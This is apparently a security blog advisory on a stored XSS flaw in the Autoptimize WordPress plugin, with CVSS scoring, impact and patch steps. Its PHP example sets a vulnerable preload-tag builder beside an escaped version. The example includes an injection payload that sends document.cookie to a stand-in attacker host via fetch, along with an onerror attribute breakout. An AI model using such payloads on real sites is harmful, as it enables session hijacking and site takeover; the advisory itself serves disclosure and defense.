
CVE-2025-13401: Critical Stored XSS Vulnerability in Autoptimize WordPress Plugin

Overview

A stored Cross-Site Scripting (XSS) vulnerability, identified as CVE-2025-13401, has been discovered in the Autoptimize plugin for WordPress. It affects all versions up to and including 3.1.13. An authenticated attacker with Contributor-level access or higher can store malicious JavaScript in a post's settings so that it is emitted into the page markup. Because the payload is stored server-side, it executes in the browser of every visitor who loads the affected page, including logged-in editors and administrators, which can lead to account compromise, data theft, or other malicious actions carried out with the victim's privileges.

Technical Details

The vulnerability resides in the create_img_preload_tag function, which belongs to the LCP (Largest Contentful Paint) image preloading metabox shown on the post edit screen. The function takes the image attributes saved through that metabox and builds a preload tag (a <link rel="preload" as="image"> element) that Autoptimize emits in the page's <head>. The attribute values are neither sanitized on input nor escaped on output, so a Contributor who saves a value such as "><script>...</script> in an image attribute (for example the src or srcset attribute) closes the attribute and injects arbitrary markup. The stored value is rendered verbatim whenever the page is loaded, and the injected script runs in every visitor's browser.
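The following PHP is an added illustration of the bug class, not Autoptimize's own code: the function names, the attribute names and the sample input are assumptions chosen to show the general pattern (user-controlled image attributes concatenated into a preload tag) next to the escaped form using the WordPress helpers esc_url() and esc_attr(). Shims for those two helpers are defined so the file runs with plain PHP outside WordPress; inside WordPress the real functions are used instead.

```php
<?php
// Added example: illustrative reconstruction of the vulnerable pattern behind
// CVE-2025-13401 beside a hardened version. Not Autoptimize's actual source.

// Stand-alone shims so the example runs without WordPress. The real esc_url()
// is more permissive (it also accepts relative paths); this stand-in accepts
// only absolute http(s), protocol-relative and root-relative URLs.
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_url')) {
    function esc_url(string $url): string {
        $url = trim($url);
        if ($url === '' || !preg_match('#^(?:https?://|//|/)#i', $url)) {
            return ''; // rejects javascript:, data: and attribute-breakout input
        }
        return esc_attr($url);
    }
}

// Vulnerable pattern: stored attribute values concatenated straight into markup.
// (Hypothetical function name; mirrors the described failure mode.)
function vulnerable_img_preload_tag(array $img): string {
    $tag = '<link rel="preload" as="image" href="' . $img['src'] . '"';
    if (!empty($img['srcset'])) {
        $tag .= ' imagesrcset="' . $img['srcset'] . '"';
    }
    return $tag . '>';
}

// Hardened pattern: URL-validate the href, attribute-escape everything else.
function hardened_img_preload_tag(array $img): string {
    $tag = '<link rel="preload" as="image" href="' . esc_url($img['src']) . '"';
    if (!empty($img['srcset'])) {
        $tag .= ' imagesrcset="' . esc_attr($img['srcset']) . '"';
    }
    return $tag . '>';
}

// Quick check a reviewer can apply to emitted markup: a preload tag must be a
// single self-contained <link ...> element with no nested tags or handlers.
function preload_tag_is_clean(string $html): bool {
    return preg_match('/^<link(?:\s+[a-z-]+="[^"<>]*")*\s*>$/i', $html) === 1
        && stripos($html, '<script') === false;
}

// Constructed sample of what a Contributor could save in the metabox: the value
// closes the href attribute, injects a script, and reopens an attribute so the
// remainder of the original tag still parses.
$contributor_input = [
    'src'    => '"><script>fetch("https://attacker.example/?c="+document.cookie)</script><link href="',
    'srcset' => 'a.jpg 1x" onerror="alert(1)',
];

$bad  = vulnerable_img_preload_tag($contributor_input);
$good = hardened_img_preload_tag($contributor_input);

echo "vulnerable: $bad\n";                                   // script tag lands in <head>
echo "hardened:   $good\n";                                  // href="" and escaped srcset
echo 'vulnerable clean? ', var_export(preload_tag_is_clean($bad), true), "\n";  // false
echo 'hardened clean?   ', var_export(preload_tag_is_clean($good), true), "\n"; // true
```

Run it with `php example.php`. The point to take from the output is that the hardened version never has to recognise the payload: esc_url() rejects the src because it is not a URL at all, and esc_attr() turns the quote in srcset into `&quot;`, so the attribute cannot be closed early regardless of what follows.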

CVSS Analysis

The Common Vulnerability Scoring System (CVSS) score for CVE-2025-13401 is 6.4 (Medium).

  • Attack Vector (AV): Network (N)
  • Attack Complexity (AC): Low (L)
  • Privileges Required (PR): Low (L)
  • User Interaction (UI): None (N)
  • Scope (S): Changed (C)
  • Confidentiality Impact (C): Low (L)
  • Integrity Impact (I): Low (L)
  • Availability Impact (A): None (N)

The full vector is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N, which evaluates to 6.4. The score reflects that the attacker must already hold an account (Contributor or above) and that the direct impact on the vulnerable component is limited. User Interaction is rated None because the victim only has to load a page in the normal course of browsing; no additional click is needed once the payload is stored. Scope is Changed because the script runs in visitors' browsers, outside the plugin's own security authority. The low attack complexity, and the fact that an administrator viewing the page runs the injected script with administrator privileges, are what make a Medium-rated stored XSS a practical route to full site takeover.

Possible Impact

Successful exploitation of this vulnerability can have several serious consequences:

  • Account Compromise: The script runs with the privileges of whoever is viewing the page. WordPress authentication cookies are set HttpOnly, so outright cookie theft via document.cookie is unlikely to work; the realistic path is for the script to perform privileged actions in an administrator's session (for example, calling the REST API or admin-ajax with the victim's nonce to create a new administrator account or edit plugin files), which yields full control of the site.
  • Data Theft: Any content the victim can see or fetch, including unpublished posts and user data exposed through the admin interface, can be read and exfiltrated.
  • Malicious Redirection: Visitors could be redirected to phishing sites or other malicious websites.
  • Website Defacement: The attacker could modify the website's content, damaging its reputation.
  • Malware Distribution: The injected script could be used to serve malware or drive-by downloads to website visitors.

Mitigation and Patch Steps

To protect your website from CVE-2025-13401, it is crucial to take the following steps:

  1. Update Autoptimize: Update the plugin to a version later than 3.1.13 (3.1.14 at the earliest) as soon as possible; those releases contain the fix. Confirm the installed version on the Plugins screen or with `wp plugin get autoptimize --field=version` if WP-CLI is available.
  2. Review User Roles: Contributor is the lowest role that gets a post edit screen, and therefore the LCP image metabox. Audit who holds Contributor access (guest authors are a common source), remove stale accounts, and treat that role as trusted rather than as a harmless default.
  3. Review Existing Content: Updating stops new injection but does not remove payloads already stored. Check the LCP image preload settings on existing posts, especially those created by Contributor-level accounts, for values containing quotes, angle brackets, or a javascript: scheme, and inspect rendered pages for unexpected <script> tags inside the <head>.
  4. Implement a Web Application Firewall (WAF): A WAF can block common XSS payloads in submitted form data, but it is a compensating control only; it will not catch every encoding and does not replace the update.
  5. Regular Security Audits: Conduct regular security audits of your WordPress website and plugins, and keep all plugins on supported, current versions.

About the Author

Cybersecurity specialist and founder of Gowri Shankar Infosec - a professional blog dedicated to sharing actionable insights on cybersecurity, data protection, server administration, and compliance frameworks including SOC 2, PCI DSS, and GDPR.
